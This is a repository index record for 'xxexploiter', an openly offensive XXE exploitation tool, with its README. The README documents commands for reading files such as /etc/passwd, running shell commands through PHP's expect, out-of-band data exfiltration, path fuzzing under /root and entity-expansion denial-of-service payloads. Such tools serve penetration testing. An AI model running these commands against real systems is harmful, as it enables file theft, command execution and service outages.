{"id":13542284,"url":"https://github.com/luisfontes19/xxexploiter","last_synced_at":"2026-04-10T10:35:13.137Z","repository":{"id":38995858,"uuid":"247289593","full_name":"luisfontes19/xxexploiter","owner":"luisfontes19","description":"Tool to help exploit XXE vulnerabilities","archived":false,"fork":false,"pushed_at":"2023-02-04T12:32:01.000Z","size":1388,"stargazers_count":540,"open_issues_count":4,"forks_count":69,"subscribers_count":14,"default_branch":"master","last_synced_at":"2024-11-03T07:33:12.967Z","etag":null,"topics":["cdata","command","dtd","entities","exection","expect","exploit","exploitation","external","file","oob","read","ssrf","xee","xml","xxe"],"latest_commit_sha":null,"homepage":"https://luisfontes19.github.io/xxexploiter/","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/luisfontes19.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2020-03-14T14:15:30.000Z","updated_at":"2024-11-01T22:22:01.000Z","dependencies_parsed_at":"2023-02-13T20:50:41.121Z","dependency_job_id":null,"html_url":"https://github.com/luisfontes19/xxexploiter","commit_stats":null,"previous_names":[],"tags_count":8,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/luisfontes19%2Fxxexploiter","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/luisfontes19%2Fxxexploiter/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/luisfontes19%2Fxxexploiter/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/luisfontes19%2Fx
xexploiter/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/luisfontes19","download_url":"https://codeload.github.com/luisfontes19/xxexploiter/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":246789318,"owners_count":20834274,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cdata","command","dtd","entities","exection","expect","exploit","exploitation","external","file","oob","read","ssrf","xee","xml","xxe"],"created_at":"2024-08-01T10:01:04.035Z","updated_at":"2026-04-10T10:35:13.103Z","avatar_url":"https://github.com/luisfontes19.png","language":"TypeScript","funding_links":[],"categories":["Exploitation","Weapons","TypeScript (64)","TypeScript"],"sub_categories":["XXE Injection","Tools"],"readme":"# XXExploiter  \r\n  \r\n![Build](https://github.com/luisfontes19/xxexploiter/workflows/Build/badge.svg)\r\n[![codecov](https://codecov.io/gh/luisfontes19/xxexploiter/branch/master/graph/badge.svg)](https://codecov.io/gh/luisfontes19/xxexploiter)\r\n[![Known Vulnerabilities](https://snyk.io/test/github/luisfontes19/xxexploiter/badge.svg?targetFile=package.json)](https://snyk.io/test/github/luisfontes19/xxexploiter?targetFile=package.json)\r\n[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT)\r\n\r\n![XXExploiter](banner.png?raw=true)\r\n\r\n\r\nIt generates the XML payloads, and automatically starts a server to serve the needed DTD's or to do data exfiltration.   
\r\n\r\n## Installation  \r\n  \r\n```\r\n#install node and npm if you don't have it yet \r\nnpm install -g xxexploiter\r\n```\r\n  \r\n## Building \u0026 Running from source\r\nThis is a simple Node application written in TypeScript, so you can build it as you build other apps:  \r\n(install node and npm first, if you don't have them)  \r\n```  \r\nnpm install  \r\nnpm run build  \r\n#you may need to npm install typescript -g in order for 'npm run build' to succeed \r\n```  \r\n  \r\nYou can run the app in one of 3 ways:  \r\n  \r\n```  \r\nnpm start [args]  \r\nnode dist/index.js [args]  \r\nnpm link #and now just call xxexploiter\r\n```  \r\n\r\nOr you can install it on your system:\r\n\r\n```\r\nnpm link\r\n```\r\n  \r\n## Usage  \r\n  \r\n```  \r\nUsage: xxexploiter [command] [options]\r\n\r\nCommands:\r\n  xxexploiter file [file_to_read]  Use XXE to do a request\r\n  xxexploiter request [URL]        Use XXE to do a request\r\n  xxexploiter expect [command]     Use XXE to execute a command through PHP's expect\r\n  xxexploiter xee [expantions]     Generate a huge content by resolving entities\r\n\r\nFuzzing Specific Options\r\n  -w, --wordlist        Path to a wordlist to be used with the fuzz command. Use {{FUZZ}} placeholder in the command arg\r\n                        for the magic.\r\n  -y, --success-string  String to search for a success response in the requests. Not usefull for blind attacks\r\n  -n, --error-string    String to search for an error response in the request. Not usefull for blind attacks\r\n\r\nOptions:\r\n  --version             Show version number                                                                    [boolean]\r\n  -s, --server          Server address for OOB and DTD\r\n  -p, --port            Server port for OOB and DTDs. Default: 7777\r\n  -t, --template        path to an XML template where to inject payload\r\n  -m, --mode            Extraction Mode: xml, oob, cdata. 
Default: xml\r\n  -e, --encode          Extraction Encoding: none, phpbase64. Default: none\r\n  -o, --output          Output for the XML payload file. Default is to console\r\n  -x                    Use a request to automatically send the xml file\r\n  -X, --request-output  Output the response from -x option. If not defined goes to stdout\r\n  --verbose             Enable some messages help for understanding whats happening\r\n  --doctype             Specify the name of the doctype to be injected. Default is xxexploiter\r\n  -h, --help            Show help                                                                              [boolean]\r\n\r\nExamples:\r\n  xxexploiter expect ls\r\n  xxexploiter -s 127.0.0.1 expect ls -e phpbase64 -m oob -o output.xml\r\n  xxexploiter -s 127.0.0.1 file /c/windows/win.ini -t xmltemplate.xml -m oob\r\n  xxexploiter xee 900000000 -o output.xml\r\n  xxexploiter file /etc/passwd -x request.txt -t template.xml\r\n  xxexploiter file /root/{FUZZ} -w wordlist.txt -n \"not found\" -x request.txt\r\n\r\nExtra Info:\r\n  - When using the xml or cdata modes, add the placeholder '{{XXE}}' in the field where you want the entity content to\r\n  be injected\r\n  - When specifiying file paths for windows use forward slash.\r\n  - OOB: Out Of Bound: You can use this option to send the data processed by the xml parser, to your local webserver.\r\n  Usefull with blind attacks\r\n  - When using XML mode, it may break the XML parsing if XML reserved characters are loaded, so you may want to use\r\n  cdata\r\n  - When using the request option, you can specify the placeholder to inject the payload with {{XXE}} or {{XXE_B64}}\r\n  - When fuzzing you can add the {{FUZZ}} keyword in the main command argument.\r\n  - You can specify a string to filter successfull requests when fuzzing, either by supplying an expected error string,\r\n  or an expected success string\r\n```  \r\n\r\n### Examples\r\n\r\n#### Simple payload 
Generation\r\n[![asciicast](https://asciinema.org/a/315867.svg)](https://asciinema.org/a/315867)\r\n\r\n#### Automating request to send payload\r\n[![asciicast](https://asciinema.org/a/315872.svg)](https://asciinema.org/a/315872)\r\n\r\n#### OOB Extraction with automated request\r\n[![asciicast](https://asciinema.org/a/315873.svg)](https://asciinema.org/a/315873)\r\n\r\n#### Fuzzing\r\n[![asciicast](https://asciinema.org/a/315876.svg)](https://asciinema.org/a/315876)\r\n   \r\n## Some notes:  \r\n  \r\nIf you choose to use OOB or CDATA mode, XXExploiter will generate the necessary DTDs to be included and will start a server to host them. Keep in mind that if you use these options you should set the server address.  \r\n  \r\nIf you include content in the body of the XML, keep in mind that XML restricted characters like '\u003c' may break the parsing, so be sure to use CDATA or PHP's base64 encoding.  \r\n  \r\nMost languages limit the number of entity expansions, or the total length of the expanded content, so make sure you test XEE on your machine first, under the same conditions as the target.  \r\n  \r\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fluisfontes19%2Fxxexploiter","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fluisfontes19%2Fxxexploiter","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fluisfontes19%2Fxxexploiter/lists"}